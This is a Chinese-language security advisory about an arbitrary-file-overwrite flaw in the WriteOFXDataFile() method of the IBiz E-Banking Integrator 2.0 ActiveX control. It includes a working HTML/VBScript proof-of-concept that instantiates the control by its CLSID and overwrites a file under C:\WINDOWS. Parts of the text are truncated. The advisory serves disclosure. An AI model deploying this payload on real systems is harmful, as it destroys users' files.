IBiz E-Banking Integrator ActiveX控件WriteOFXDataFile()不安

影响系统：IBiz E-Banking Integrator 2.0 软件系统描述： ——————————————————————————————— 在BUGTRAQ ID 28700中，IBiz E-Banking Integrator是一款旨在从银行和投资公司等账户获取财务交易信息的解决方案。这款软件中的一个重要组件IBizEBank.FIProfile.1 ActiveX控件（即 fiprofile20.ocx）在处理WriteOFXDataFile()方法的调用时存在缺陷。如果用户不慎访问恶意网页，可能会遭受攻击，导致以当前登录用户的权限覆盖和破坏系统上的任意文件。此警告信息来源于shinnai（），并已在secunia上发布详细的安全咨询（链接： <object classid='clsid:24445430-F789-11CE-86F8-0020AFD8C6DB' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='点击开始测试'> <script language='vbscript'> Sub tryMe() On Error Resume Next test.WriteOFXDataFile "C:\WINDOWS\system_i" If Err.Number <> 0 Then MsgBox "出现问题！" Else MsgBox "攻击完成！" End If End Sub </script> 建议措施：厂商尚未提供补丁或升级程序。我们强烈建议此软件的用户密切关注厂商的主页（